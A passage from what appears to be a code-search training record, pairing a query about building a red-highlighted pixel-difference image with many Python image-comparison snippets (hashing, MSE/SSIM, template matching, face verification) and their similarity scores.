return np.sum(pred)", "def ff_correct_image(image):\n pass", "def ff_correct_image(image):\n pass", "def assert_widget_image(tmpdir, widget, filename, fail_now=True):\n\n # If requested, save the \"actual\" images in another directory that will be\n # preserved beyond the test run.\n\n if IMAGE_OUTPUT_DIR:\n actual = os.path.join(IMAGE_OUTPUT_DIR, filename)\n else:\n actual = tmpdir.join(filename).strpath\n\n widget.render(actual)\n\n # Compare to the references\n\n refdir = os.path.join(DATA, 'refimg_' + os.path.splitext(filename)[0])\n results = []\n\n for refbase in sorted(os.listdir(refdir)):\n refname = os.path.splitext(refbase)[0]\n expected = os.path.join(refdir, refbase)\n rv = compare_images(\n expected,\n actual,\n tol=IMAGE_COMPARISON_TOLERANCE,\n in_decorator=True\n )\n\n if rv is None:\n # Success! Clean up any fail images (mostly for the IMAGE_OUTPUT_DIR mode)\n for p in glob(actual.replace('.png', '_vs_*.png')):\n os.unlink(p)\n return None\n\n failpath = actual.replace('.png', '-failed-diff.png')\n newfailpath = actual.replace('.png', '_vs_%s.png' % refname)\n os.rename(failpath, newfailpath)\n results.append((refname, rv['rms']))\n\n # Nothing was good enough :-(\n #\n # We used to have machinery here to emit a \"reproduction script\" that\n # printed out Python code to recreate the image files using big\n # BASE64-encoded strings, but now we can just use Azure Pipelines artifacts.\n # Consult the Git history if the reproduction script stuff is needed again.\n\n msg = (\n 'observed image %s did not match any references to required RMS tolerance of '\n '%.2f; results were: %s'\n ) % (actual, IMAGE_COMPARISON_TOLERANCE, ', '.join('%s=%.2f' % t for t in results))\n\n if fail_now:\n pytest.fail(msg, pytrace=False)\n\n return '{}: {}'.format(filename, msg)", "def compare_reduce_with_reference(im, factor, average_diff=0.4, max_diff=1):\n reduced = im.reduce(factor)\n\n if not isinstance(factor, (list, tuple)):\n factor = (factor, factor)\n\n reference = Image.new(im.mode, reduced.size)\n area_size = (im.size[0] // factor[0], im.size[1] // factor[1])\n area_box = (0, 0, area_size[0] * factor[0], area_size[1] * factor[1])\n area = im.resize(area_size, Image.Resampling.BOX, area_box)\n reference.paste(area, (0, 0))\n\n if area_size[0] < reduced.size[0]:\n assert reduced.size[0] - area_size[0] == 1\n last_column_box = (area_box[2], 0, im.size[0], area_box[3])\n last_column = im.resize(\n (1, area_size[1]), Image.Resampling.BOX, last_column_box\n )\n reference.paste(last_column, (area_size[0], 0))\n\n if area_size[1] < reduced.size[1]:\n assert reduced.size[1] - area_size[1] == 1\n last_row_box = (0, area_box[3], area_box[2], im.size[1])\n last_row = im.resize((area_size[0], 1), Image.Resampling.BOX, last_row_box)\n reference.paste(last_row, (0, area_size[1]))\n\n if area_size[0] < reduced.size[0] and area_size[1] < reduced.size[1]:\n last_pixel_box = (area_box[2], area_box[3], im.size[0], im.size[1])\n last_pixel = im.resize((1, 1), Image.Resampling.BOX, last_pixel_box)\n reference.paste(last_pixel, area_size)\n\n assert_compare_images(reduced, reference, average_diff, max_diff)", "def compare_images(original_img, transformed_img):\r\n original_img = np.array(original_img, np.float32)\r\n transformed_img = np.array(transformed_img, np.float32)\r\n\r\n mse = metrics.mean_squared_error(original_img, transformed_img)\r\n nrmse = metrics.normalized_root_mse(original_img, transformed_img)\r\n ssim = metrics.structural_similarity(original_img, transformed_img)\r\n psnr = metrics.peak_signal_noise_ratio(original_img, transformed_img, data_range=255)\r\n\r\n return {\"MSE\": mse, \"NRMSE\": nrmse, \"PSNR\": psnr, \"SSIM\": ssim}", "def test_Image():\n assert Image(cur, \"Simple_Linear\").detect_image() == True\n assert Image(cur, \"Logistic_Linear\").detect_image() == False\n assert Image(cur, \"Simple_Linear\").date == \"2021-04-20\"\n assert Image(cur, \"Breslow-Day_Test\").source == \"Course BIOSTAT703 slide\"", "def pairing(left, right):\n # same class: 0\n if left[label] == right[label]:\n flag = 0\n # not same: 1\n else:\n flag = 1\n return tf.cast(left[\"image\"], tf.float32) / 255., tf.cast(right[\"image\"], tf.float32) / 255., tf.cast(flag, tf.float32)", "def compare(buffer1, buffer2, threshold=0):\n # Count changed pixels\n changedPixels = 0\n print \"In compare buf1: %s buf2: %s\" % (buffer1, buffer2)\n for x in xrange(0, 100):\n # Scan one line of image then check sensitivity for movement\n for y in xrange(0, 75):\n # Just check green channel as it's the highest quality channel\n pixdiff = abs(buffer1[x, y][1] - buffer2[x, y][1])\n if pixdiff > threshold:\n changedPixels += 1", "def test_one_image(self, img):\n return self.__image_pipeline(img)", "def image_hash(image_location):\n image = pygame.image.load(image_location)\n grey = greyscale(image)\n avg = average_image_value(grey)\n\n bitstring = ''\n for pixels in get_pixels(grey):\n if pixels[0] < avg:\n bitstring += '1'\n else: bitstring += '0'\n hash = int(bitstring, 2).__format__('016x').upper()\n return hash", "def similarity_score(self, img1, img2):\n\t\t# resize into the same shape first\n\t\tif img1.shape != img2.shape:\n\t\t\tv, h = max(img1.shape[0], img2.shape[0]), max(img1.shape[1], img2.shape[1])\n\t\t\tdim = (h, v)\n\t\t\th_scale = min(img1.shape[1], img2.shape[1]) / h\n\t\t\tv_scale = min(img1.shape[0], img2.shape[0]) / v\n\t\t\timg1 = cv2.resize(img1, dim, interpolation = cv2.INTER_AREA)\n\t\t\timg2 = cv2.resize(img2, dim, interpolation = cv2.INTER_AREA)\n\t\t# # histogram\n\t\t# diff = 0\n\t\t# for c in range(3):\n\t\t# \thist1 = cv2.calcHist([img1], [c], None, [256], [0, 256])\n\t\t# \thist2 = cv2.calcHist([img2], [c], None, [256], [0, 256])\n\t\t# \tdiff += np.linalg.norm(hist1 - hist2)\n\n\t\t# HoG\n\t\tfd1, _ = hog(img1, orientations=8, pixels_per_cell=(16, 16),\n cells_per_block=(1, 1), visualize=True, multichannel=True)\n\t\tfd2, _ = hog(img2, orientations=8, pixels_per_cell=(16, 16),\n cells_per_block=(1, 1), visualize=True, multichannel=True)\n\t\t# Combine both\n\t\tdist = np.linalg.norm(fd1 - fd2)\n\t\taim = mean_pixel_intensity_diff(img1, img2)\n\t\tscore = 1 / (dist + aim + 1)\n\t\treturn score", "def test_replace_image(self):\n pass", "def _compare_images(self, ax, filename, tol=10):\n assert isinstance(ax, Artist)\n if GENERATE_BASELINE:\n savefig(os.path.join(BASELINE_DIR, filename))\n savefig(os.path.join(self.tempdir, filename))\n err = compare_images(os.path.join(BASELINE_DIR, filename),\n os.path.join(self.tempdir, filename),\n tol, in_decorator=True)\n if err:\n raise ImageComparisonFailure('images not close: %(actual)s '\n 'vs. %(expected)s '\n '(RMS %(rms).3f)' % err)", "def test_filter_image():\n\n model = Instafilter(\"Lo-Fi\")\n\n f_image = __local__ / \"Normal.jpg\"\n\n img0 = cv2.imread(str(f_image))\n img1 = model(f_image)\n\n diff = (img0 - img1).sum()\n\n assert abs(diff) > 0", "def diffImage(storedFrame,currentFrame,pixThreshold):\n\n diff = cv2.absdiff(storedFrame,currentFrame)\n _,diff = cv2.threshold(diff,pixThreshold[0],255,cv2.THRESH_BINARY)\n diff = diff / 255\n return diff", "async def _process_image(self, image: Image) -> Optional[Image]:\n\n # not enabled?\n if not self._enabled:\n return None\n\n # we only accept OBJECT images\n if image.header[\"IMAGETYP\"] != \"object\":\n return None\n\n # reference header?\n if self._ref_header is None:\n log.info(\"Setting new reference image...\")\n await self._reset_guiding(image=image)\n return None\n\n # check RA/Dec in header and separation\n c1 = SkyCoord(ra=image.header[\"TEL-RA\"] * u.deg, dec=image.header[\"TEL-DEC\"] * u.deg, frame=\"icrs\")\n c2 = SkyCoord(ra=self._ref_header[\"TEL-RA\"] * u.deg, dec=self._ref_header[\"TEL-DEC\"] * u.deg, frame=\"icrs\")\n separation = c1.separation(c2).deg\n if self._separation_reset is not None and separation * 3600.0 > self._separation_reset:\n log.warning(\n 'Nominal position of reference and new image differ by %.2f\", resetting reference...',\n separation * 3600.0,\n )\n await self._reset_guiding(image=image)\n return None\n\n # check filter\n if (\n self._reset_at_filter\n and \"FILTER\" in image.header\n and \"FILTER\" in self._ref_header\n and image.header[\"FILTER\"] != self._ref_header[\"FILTER\"]\n ):\n log.warning(\"The filter has been changed since the last exposure, resetting reference...\")\n await self._reset_guiding(image=image)\n return None\n\n # get time\n date_obs = Time(image.header[\"DATE-OBS\"])\n\n # check times and focus\n if self._last_header is not None:\n # check times\n t0 = Time(self._last_header[\"DATE-OBS\"])\n if (date_obs - t0).sec > self._max_interval:\n log.warning(\"Time between current and last image is too large, resetting reference...\")\n await self._reset_guiding(image=image)\n return None\n if (date_obs - t0).sec < self._min_interval:\n log.warning(\"Time between current and last image is too small, ignoring image...\")\n return None\n\n # check focus\n if (\n \"TEL-FOCU\" in image.header\n and self._reset_at_focus\n and abs(image.header[\"TEL-FOCU\"] - self._last_header[\"TEL-FOCU\"]) > 0.05\n ):\n log.warning(\"Focus difference between current and last image is too large, resetting reference...\")\n await self._reset_guiding(image=image)\n return None\n\n # exposure time too large?\n if self._max_exposure_time is not None and image.header[\"EXPTIME\"] > self._max_exposure_time:\n log.warning(\"Exposure time too large, skipping auto-guiding for now...\")\n self._loop_closed = False\n return None\n\n # remember header\n self._last_header = image.header\n\n # get offset\n image = await self.run_pipeline(image)\n\n # get telescope\n try:\n telescope = await self.proxy(self._telescope, ITelescope)\n except ValueError:\n log.error(\"Given telescope does not exist or is not of correct type.\")\n self._loop_closed = False\n return image\n\n # apply offsets\n try:\n if await self._apply(image, telescope, self.location):\n self._loop_closed = True\n log.info(\"Finished image.\")\n else:\n log.info(\"Could not apply offsets.\")\n self._loop_closed = False\n except ValueError as e:\n log.info(\"Could not apply offsets: %s\", e)\n self._loop_closed = False\n\n # return image, in case we added important data\n return image", "def check_image_for_duplicates(original_image):\n\n original_image_hash = get_average_hash(original_image)\n\n print(f'Checking for duplicate images for {original_image}')\n\n for potential_duplicate_image in images_in_directory:\n potential_duplicate_image_hash = get_average_hash(\n potential_duplicate_image)\n\n if ((original_image != potential_duplicate_image) & compare_image_hashes(original_image_hash, potential_duplicate_image_hash)):\n return potential_duplicate_image\n\n pass", "def transform_images(img1,img2):", "def test_image_rw(self):\n from ..image import Image\n from ..io.image import read_image, write_image\n shape = (5,5)\n pix = np.random.uniform(size=shape)\n ivar = np.random.uniform(size=shape)\n mask = np.random.randint(0, 3, size=shape)\n img1 = Image(pix, ivar, mask, readnoise=1.0, camera='b0')\n write_image(self.testfile, img1)\n img2 = read_image(self.testfile)\n\n #- Check output datatypes\n self.assertEqual(img2.pix.dtype, np.float64)\n self.assertEqual(img2.ivar.dtype, np.float64)\n self.assertEqual(img2.mask.dtype, np.uint32)\n\n #- Rounding from keeping np.float32 on disk means they aren't equal\n self.assertFalse(np.all(img1.pix == img2.pix))\n self.assertFalse(np.all(img1.ivar == img2.ivar))\n\n #- But they should be close, and identical after float64->float32\n self.assertTrue(np.allclose(img1.pix, img2.pix))\n self.assertTrue(np.all(img1.pix.astype(np.float32) == img2.pix))\n self.assertTrue(np.allclose(img1.ivar, img2.ivar))\n self.assertTrue(np.all(img1.ivar.astype(np.float32) == img2.ivar))\n\n #- masks should agree\n self.assertTrue(np.all(img1.mask == img2.mask))\n self.assertEqual(img1.readnoise, img2.readnoise)\n self.assertEqual(img1.camera, img2.camera)\n self.assertEqual(img2.mask.dtype, np.uint32)\n\n #- should work with various kinds of metadata header input\n meta = dict(BLAT='foo', BAR='quat', BIZ=1.0)\n img1 = Image(pix, ivar, mask, readnoise=1.0, camera='b0', meta=meta)\n write_image(self.testfile, img1)\n img2 = read_image(self.testfile)\n for key in meta:\n self.assertEqual(meta[key], img2.meta[key], 'meta[{}] not propagated'.format(key))\n\n #- img2 has meta as a FITS header instead of a dictionary;\n #- confirm that works too\n write_image(self.testfile, img2)\n img3 = read_image(self.testfile)\n for key in meta:\n self.assertEqual(meta[key], img3.meta[key], 'meta[{}] not propagated'.format(key))", "def main(im1_filename: Path, im2_filename: Path) -> None:\n im1 = np.array(Image.open(im1_filename).convert(\"RGB\"))\n im2 = np.array(Image.open(im2_filename).convert(\"RGB\"))\n\n im1 = im1[:, :, ::-1]\n id_face_loc = get_bounding_boxes(im1)\n im1 = im1[:, :, ::-1]\n face_encodings = face_recognition.face_encodings(im1, id_face_loc, 10, \"large\")[0]\n\n im2 = im2[:, :, ::-1]\n cam_face_loc = get_bounding_boxes(im2)\n im2 = im2[:, :, ::-1]\n face_encodings2 = face_recognition.face_encodings(im2, cam_face_loc, 10, \"large\")[0]\n\n dist = face_recognition.face_distance([face_encodings], face_encodings2)[0]\n if dist < 0.5:\n print(f\"[+] These images belong to the same person! ({dist})\")\n else:\n print(f\"[-] These images do not belong to the same person! ({dist})\")", "def equalize(image, name=None):\n _check_image_dtype(image)\n\n with tf.name_scope(name or \"equalize\"):\n orig_dtype = image.dtype\n image = tf.image.convert_image_dtype(image, tf.uint8, saturate=True)\n image = tf.cast(image, tf.int32)\n\n def equalize_grayscale(image_channel):\n \"\"\"Equalizes the histogram of a grayscale (2D) image.\"\"\"\n bins = tf.constant(256, tf.int32)\n\n histogram = tf.math.bincount(image_channel, minlength=bins)\n nonzero = tf.where(tf.math.not_equal(histogram, 0))\n nonzero_histogram = tf.reshape(tf.gather(histogram, nonzero), [-1])\n step = (tf.reduce_sum(nonzero_histogram) - nonzero_histogram[-1]) // (bins - 1)\n\n # use a lut similar to PIL\n def normalize(histogram, step):\n norm_histogram = (tf.math.cumsum(histogram) + (step // 2)) // step\n norm_histogram = tf.concat([[0], norm_histogram], axis=0)\n norm_histogram = tf.clip_by_value(norm_histogram, 0, bins - 1)\n return norm_histogram\n\n return tf.cond(tf.math.equal(step, 0),\n lambda: image_channel,\n lambda: tf.gather(normalize(histogram, step), image_channel))\n\n channels_first_image = tf.transpose(image, [2, 0, 1])\n channels_first_equalized_image = tf.map_fn(equalize_grayscale, channels_first_image)\n equalized_image = tf.transpose(channels_first_equalized_image, [1, 2, 0])\n\n equalized_image = tf.cast(equalized_image, tf.uint8)\n equalized_image = tf.image.convert_image_dtype(equalized_image, orig_dtype)\n return equalized_image", "def compare_group_images(directory, show_imgs=True, similarity=\"high\", compression=100):\n # list where the found duplicate/similar images are stored\n duplicates = []\n lower_res = []\n\n imgs_matrix = create_imgs_matrix(directory, compression)\n\n # search for similar images\n if similarity == \"low\":\n ref = 13000\n # search for 1:1 duplicate images\n else:\n ref = 21000\n\n main_img = 0\n compared_img = 1\n nrows, ncols = compression, compression\n srow_A = 0\n erow_A = compression\n srow_B = erow_A\n erow_B = srow_B + compression\n\n while erow_B <= imgs_matrix.shape[0]:\n while compared_img < (len(image_files)):\n # select two images from imgs_matrix\n imgA = imgs_matrix[srow_A: erow_A, # rows\n 0: ncols] # columns\n imgB = imgs_matrix[srow_B: erow_B, # rows\n 0: ncols] # columns\n # compare the images\n rotations = 0\n while image_files[main_img] not in duplicates and rotations <= 3:\n if rotations != 0:\n imgB = rotate_img(imgB)\n err = mse(imgA, imgB)\n print ( \"err:\", err)\n if err <= ref:\n if show_imgs == True:\n show_file_info(compared_img, main_img)\n add_to_list(image_files[main_img], duplicates)\n check_img_quality(directory, image_files[main_img], image_files[compared_img], lower_res)\n rotations += 1\n srow_B += compression\n erow_B += compression\n compared_img += 1\n\n srow_A += compression\n erow_A += compression\n srow_B = erow_A\n erow_B = srow_B + compression\n main_img += 1\n compared_img = main_img + 1\n\n msg = \"\\n***\\n DONE: found \" + str(len(duplicates)) + \" duplicate image pairs in \" + str(\n len(image_files)) + \" total images.\\n The following files have lower resolution:\"\n print(msg)\n return set(lower_res)", "def verify(image_path, database, model):\n\n ### START CODE HERE ###\n\n # Step 1: Compute the encoding for the image. Use img_to_encoding() see example above. (≈ 1 line)\n status, encoding = img_to_encoding(image_path, model, resize=True)\n if not status:\n return None, None, encoding\n\n dist = 0\n\n # Step 2: Compute distance with identity's image (≈ 1 line)\n for (name, db_enc) in database.items():\n\n dist += np.linalg.norm(db_enc - encoding)\n\n final_dist = dist / len(database)\n\n # Step 3: Open the door if dist < 0.7, else don't open (≈ 3 lines)\n if final_dist < 0.7:\n print(\"welcome home!\")\n match = True\n else:\n print(\"please go away\")\n match = False\n\n ### END CODE HERE ###\n\n return final_dist, match, encoding", "def test_check_image_color(self):\n result = analyzer.check_image_color(\"tests/test_files/sample.jpg\")\n self.assertEqual(result, \"light\")", "def setReference(this, **kargs):\n\t\t\n\t\t# Arguments\n\t\tsumSeuil = kargs.get('sumSeuil', 200)\n\t\trefSeuil = kargs.get('refSeuil', 150)\n\t\tinterval = kargs.get('interval', 0)\n\t\tcheck = kargs.get('check', False)\n\t\tcount = kargs.get('count', 1)\n\t\t\n\t\t# Image cumulative\n\t\tcumul = None\n\t\t\n\t\t# Capture image par image\n\t\tif count > 1: printf('Prise de reference sur %d prises... ' % count)\n\t\tfor i in xrange(count):\n\t\t\tif i and interval: time.sleep(interval/1000)\n\t\t\t\n\t\t\t# Prise d'image\n\t\t\tthis.getFrame()\n\t\t\t\n\t\t\t# Référence actuelle\n\t\t\tcurrent = this._FRAME\n\t\t\t\n\t\t\tif i: # Si ce n'est plus la première itération\n\t\t\t\t\n\t\t\t\tif check:\n\t\t\t\t\t# Détection d'un changement\n\t\t\t\t\tthis.detectByRef(seuil=refSeuil, ref=result, frame=current)\n\t\t\t\t\tsum = this.binary.sum()/255\n\t\t\t\t\tif sum > sumSeuil: # Crash\n\t\t\t\t\t\traise Exception(\"Don't interfere with the reference ! (%d)\" % sum)\n\t\t\t\t# END CHECK\n\t\t\t\t\n\t\t\t\t# Cumulation\n\t\t\t\tcumul += current\n\t\t\t\n\t\t\telse: # Première itération\n\t\t\t\tcumul = current.astype(int)\n\t\t\t\t\n\t\t\t# Calcul de l'image moyenne actuelle\n\t\t\tresult = (cumul / (i+1)).astype(np.uint8)\n\t\t###\n\t\t\n\t\tthis.resetBin()\n\t\tthis._REF = result\n\t\tif count > 1: print 'ok'\n\t\treturn result", "def image_reference(self, image_id):\n return self.image_info[image_id]", "def is_new_based_on_imgs(soup):\n\n \n \n prev_hashes = get_prev_img_hashes()\n temp_hashes = get_temp_img_hashes(soup)\n\n if len(temp_hashes.difference(prev_hashes))>0:\n print(\"new, based on images\")\n return True\n else:\n return False", "def do_comparex(self, str_arg):\n arg = validateString(str_arg)\n file1, fileset = arg.split(' ', 1)\n if len(fileset) == 0:\n self.resultFlag = False\n raise ValueError('Bad parameter. Please check your script.')\n if not os.path.isfile(file1):\n self.resultFlag = False\n raise ValueError(file1 + ' not exist, Please check your script.')\n # f_list=[pp1 for pp1 in fileset.split(' ') if pp1!='']\n for fn in fileset.split(' '):\n # print file1, f2\n if not os.path.isfile(fn):\n self.resultFlag = False\n raise ValueError(fn + ' not exist, Please check your script.')\n if self.__compareImage(file1, fn):\n self.resultFlag = True\n print('[Found match. %s and %s are identical.]' % (file1, fn))\n return\n print('[No match found.]')\n self.resultFlag = False", "def check_image(self, image, temps):\n self.logger.debug('Check image \"%s\"', image)\n _, edges = cv2.threshold(cv2.imread(image, 0), 127, 255, cv2.THRESH_BINARY)\n\n result = []\n for filename in temps:\n template = cv2.imread(filename, 0)\n width, hight = template.shape[::-1]\n\n res = cv2.matchTemplate(edges, template, cv2.TM_CCORR_NORMED)\n if self.multi:\n for point in zip(*np.where(res >= self.threshold)[::-1]):\n result.append((point, (point[0] + width, point[1] + hight)))\n else:\n _, max_val, _, max_loc = cv2.minMaxLoc(res)\n if max_val > self.threshold:\n result.append((max_loc, (max_loc[0] + width, max_loc[1] + hight)))\n return result", "def check_for_updated_image(self, image):\n for account in self.accounts:\n rc, rsp = self.cal.get_image_list(account)\n\n for curr_image in rsp.imageinfo_list:\n if curr_image.name == image.name:\n local_cksum = rift.auto.vm_utils.md5checksum(image.location)\n if local_cksum == curr_image.checksum:\n return curr_image.id\n else:\n # delete out-dated image\n logger.debug(\"Deleting openstack image: %s\", curr_image.name)\n self.cal.delete_image(account, curr_image.id)\n break\n return None", "def show_with_diff(image, reference, title):\n pl.figure(figsize=(5, 3.3))\n pl.subplot(1, 2, 1)\n pl.title('Image')\n pl.imshow(image, vmin=0, vmax=1, cmap=pl.cm.gray, interpolation='nearest')\n pl.xticks(())\n pl.yticks(())\n pl.subplot(1, 2, 2)\n difference = image - reference\n\n pl.title('Difference (norm: %.2f)' % np.sqrt(np.sum(difference ** 2)))\n pl.imshow(difference, vmin=-0.5, vmax=0.5, cmap=pl.cm.PuOr,\n interpolation='nearest')\n pl.xticks(())\n pl.yticks(())\n pl.suptitle(title, size=16)\n pl.subplots_adjust(0.02, 0.02, 0.98, 0.79, 0.02, 0.2)", "def test_binary_compare(self):\n dataset = make_fixture(binary=True, split=True)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y.train, dataset.y.test) is oz\n assert oz._mode == COMPARE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def image_ref(self) -> Optional[str]:\n _args: list[Arg] = []\n _ctx = self._select(\"imageRef\", _args)\n return _ctx.execute_sync(Optional[str])", "def verify(image_path, identity, database, model):\n\n # Compute the encoding for the image.\n encoding = M.img_to_encoding(image_path, model)\n\n # Compute distance with identity's image\n dist = np.linalg.norm(database[identity] - encoding)\n\n return dist", "def brain_has_lead_image(self, brain=None):", "def track(self, image):\r\n \r\n # if the object was initialized correctrly\r\n if self.well_initialized:\r\n ok, self.object_bound_rect = self.tracker.update(image)\r\n \r\n return ok, self.object_bound_rect", "def show_with_diff(image, reference, title):\r\n plt.figure(figsize=(5, 3.3))\r\n plt.subplot(1, 2, 1)\r\n plt.title('Image')\r\n plt.imshow(image, vmin=0, vmax=1, cmap=plt.cm.gray,\r\n interpolation='nearest')\r\n plt.xticks(())\r\n plt.yticks(())\r\n plt.subplot(1, 2, 2)\r\n difference = image - reference\r\n\r\n plt.title('Difference (norm: %.2f)' % np.sqrt(np.sum(difference ** 2)))\r\n plt.imshow(difference, vmin=-0.5, vmax=0.5, cmap=plt.cm.gray,\r\n interpolation='nearest')\r\n plt.xticks(())\r\n plt.yticks(())\r\n plt.suptitle(title, size=16)\r\n plt.subplots_adjust(0.02, 0.02, 0.98, 0.79, 0.02, 0.2)\r\n #plt.savefig('omp_frames/simpleframe_{}.png'.format(framenum),image)\r\n scipy.misc.imsave('omp_frames/simpleframe_{}.png'.format(framenum), image)", "def test_quick_method(self):\n data = load_occupancy(return_dataset=True)\n _, y = data.to_numpy()\n\n visualizer = balanced_binning_reference(y, show=False)\n\n assert isinstance(visualizer, BalancedBinningReference)\n self.assert_images_similar(visualizer, tol=0.5)", "def trackdiffImage(storedFrame,currentFrame,pixThreshold):\n diff = cv2.absdiff(storedFrame,currentFrame)\n _,diff = cv2.threshold(diff,pixThreshold[1],255,cv2.THRESH_BINARY)\n return diff", "def cli(fig1, fig2, out):\n click.echo('\\n' + '.' * 50)\n\n # open first image\n image1 = Image.open(fig1)\n\n # open second image\n image2 = Image.open(fig2)\n\n # retrieve the image dimensions.\n width, height = image1.size\n width2, height2 = image2.size\n\n if [width, height] != [width2, height2]:\n print(\"Image dimensions do not match! The Two inputs must have equal dimensions\")\n exit(1)\n else:\n print(\"Fig1 dimensions: \", image1.size)\n print(\"Fig2 dimensions: \", image2.size)\n # Create a new image object.\n merged = Image.new('RGB', image1.size)\n\n for i in range(0, width):\n for j in range(0, height):\n ima1 = list(image1.getpixel((i, j)))\n ima2 = list(image2.getpixel((i, j)))\n if ima1 == ima2:\n r, g, b, a = ima1\n elif [ima1[0], ima1[1], ima1[2]] == [0, 0, 0] and [ima2[0], ima2[1], ima2[2]] != [0, 0, 0]:\n r, g, b, a = ima2\n elif [ima1[0], ima1[1], ima1[2]] != [0, 0, 0] and [ima2[0], ima2[1], ima2[2]] == [0, 0, 0]:\n r, g, b, a = ima1\n elif [ima1[0], ima1[1], ima1[2]] != [0, 0, 0] and ima2 == [255, 255, 255, 255]:\n r, g, b, a = ima1\n elif [ima2[0], ima2[1], ima2[2]] != [0, 0, 0] and ima1 == [255, 255, 255, 255]:\n r, g, b, a = ima2\n else:\n # print ima1,ima2\n r = (ima1[0] + ima2[0]) // 2\n g = (ima1[1] + ima2[1]) // 2\n b = (ima1[2] + ima2[2]) // 2\n a = 255\n # print [r,g,b,a]\n\n merged.putpixel((i, j), (r, g, b, a))\n merged.save(out)\n click.echo('\\n' + '.' * 50)", "def compare(image_a, image_b):\n image_a = standardize_format(image_a)\n grayscale_image_a = to_grayscale(image_a)\n image_b = standardize_format(image_b)\n grayscale_image_b = to_grayscale(image_b)\n err = mse(grayscale_image_a, grayscale_image_b)\n return err", "def image_search_in_image(base_image, looking_for_img):\n base_image = cv2.imread(base_image)\n looking_for_img = cv2.imread(looking_for_img)\n # result = cv2.matchTemplate(base_image, looking_for_img, cv2.TM_SQDIFF_NORMED)\n result = cv2.matchTemplate(base_image, looking_for_img, cv2.TM_CCOEFF)\n (_, _, minLoc, maxLoc) = cv2.minMaxLoc(result)\n print(result)\n (waldoHeight, waldoWidth) = looking_for_img.shape[:2]\n topLeft = maxLoc\n botRight = (topLeft[0] + waldoWidth, topLeft[1] + waldoHeight)\n roi = base_image[topLeft[1]:botRight[1], topLeft[0]:botRight[0]]\n mask = np.zeros(base_image.shape, dtype=\"uint8\")\n puzzle = cv2.addWeighted(base_image, 0.25, mask, 0.75, 0)\n puzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]] = roi\n cv2.imshow(\"Puzzle\", puzzle)\n cv2.imshow(\"Waldo\", looking_for_img)\n cv2.waitKey(0)", "def pixel_diff(image_a, image_b):\n\n if image_a.size != image_b.size:\n raise ImageCompareException(\n \"different image sizes, can only compare same size images: A=\" + str(image_a.size) + \" B=\" + str(\n image_b.size))\n\n if image_a.mode != image_b.mode:\n raise ImageCompareException(\n \"different image mode, can only compare same mode images: A=\" + str(image_a.mode) + \" B=\" + str(\n image_b.mode))\n\n diff = ImageChops.difference(image_a, image_b)\n diff = diff.convert('L')\n\n return diff" ]
[ "0.7269888", "0.69743997", "0.6905206", "0.6846669", "0.67375135", "0.6730658", "0.67301905", "0.67132235", "0.6670823", "0.66276044", "0.65917426", "0.6564198", "0.65512747", "0.6517447", "0.65027654", "0.6423081", "0.64036614", "0.63828444", "0.6322787", "0.6311486", "0.6288014", "0.62783784", "0.6207361", "0.61736023", "0.6167509", "0.6166918", "0.61359656", "0.61344427", "0.61184293", "0.61070365", "0.60898244", "0.6050134", "0.60421544", "0.6014812", "0.5997404", "0.5991177", "0.5981526", "0.59572244", "0.5929", "0.5920695", "0.5920464", "0.5919974", "0.59162235", "0.5898405", "0.5897941", "0.58974624", "0.58899194", "0.5870713", "0.58622473", "0.5854621", "0.5854573", "0.5853867", "0.5852895", "0.585183", "0.5838607", "0.5838495", "0.58347297", "0.58321846", "0.58321846", "0.583183", "0.58249897", "0.5821577", "0.58098376", "0.5805308", "0.5785296", "0.5784873", "0.57767516", "0.5742973", "0.5736112", "0.57329124", "0.571598", "0.5714831", "0.5712934", "0.5692577", "0.5661061", "0.56572336", "0.56569237", "0.56412625", "0.56394106", "0.5637941", "0.5635137", "0.5627088", "0.5618976", "0.56158686", "0.5603021", "0.55971545", "0.5589831", "0.5561038", "0.55600023", "0.55573964", "0.5552458", "0.5547989", "0.55328584", "0.5526937", "0.55248994", "0.55239534", "0.5513896", "0.55080724", "0.55053955", "0.54988235" ]
0.7576849
0
From a matrix of difference pixels (for each pixel, we have 0 if pixel is the same, or nonzero if they are different), creates list of pixels which are different a PNG image of the same size as 'step' image, where each different pixel is coloured RED
def _build_list_of_changed_pixels(self, diff, image_width, image_height, min_width, min_height, exclude_zones): # complete diff "image" to the size of step image diff = numpy.pad(diff, ((0, max(0, image_height - min_height)), (0, max(0, image_width - min_width))), constant_values=1) # ignore excluded pixels diff *= self._build_list_of_excluded_pixels2(exclude_zones, image_width, image_height) # draw mask of differences mask = numpy.ones((image_height, image_width, 1), dtype=uint8) diff_image = numpy.zeros((image_height, image_width, 4), dtype=uint8) cnd = diff[:,:] > 0 # says which pixels are non-zeros diff_image[cnd] = mask[cnd] diff_image *= numpy.array([0, 0, 255, 255], dtype=uint8) # print red pixels diff_pixels = numpy.transpose(diff.nonzero()); return diff_pixels, diff_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def separate_colors(self):\n colors = self.get_sorted_pixels()\n colors_dict = dict((val[1], Image.new('RGB', self.size, (255,255,255))) \n for val in colors)\n pixel_dict = dict((img, []) for img in colors_dict.keys())\n\n pix = self.image.load()\n for i in range(self.width):\n for j in range(self.height):\n if pix[i,j] in colors_dict:\n colors_dict[pix[i,j]].putpixel((i,j),(0,0,0))\n pixel_dict[pix[i,j]].append((i, j))\n\n return [(color, colors_dict[color], pixels) for color, pixels in pixel_dict.items()]", "def falso_color(img):\n rows,cols = img.shape\n img_red = np.copy(img)\n img_green = np.copy(img)\n img_blue = np.copy(img)\n img_false = np.zeros((rows, cols, 3), dtype=np.uint8)\n\n for i in range(0,rows):\n for j in range(0,cols):\n\n if (0 <= img[i, j] <= 43):\n img_red[i, j] = 255\n img_green[i, j] = img[i, j] * (255 / 43)\n img_blue[i, j] = 0\n\n elif(43 < img[i, j] <= 86):\n img_red[i, j] = (255 - (img[i, j] - 43) * (255 / 43))\n img_green[i, j] = 255\n img_blue[i,j] = 0\n\n elif(86 < img[i, j] <= 128):\n img_red[i, j] = 0\n img_green[i, j] = 255\n img_blue[i, j] = ((img[i, j] - 86) * (255 / 42))\n\n elif(128<img[i, j]<=171):\n img_red[i, j] = 0\n img_green[i, j] = ((171 - img[i, j]) * (255 / 43))\n img_blue[i, j] = 255\n\n elif(171 < img[i, j] <= 214):\n img_red[i, j] = (img[i, j] - 171) * (255 / 43)\n img_green[i, j] = 0\n img_blue[i, j] = 255\n\n elif(214 < img[i, j]):\n img_red[i, j] = 255\n img_green[i, j] = 0\n img_blue[i, j] = ((255 - img[i, j]) * (255 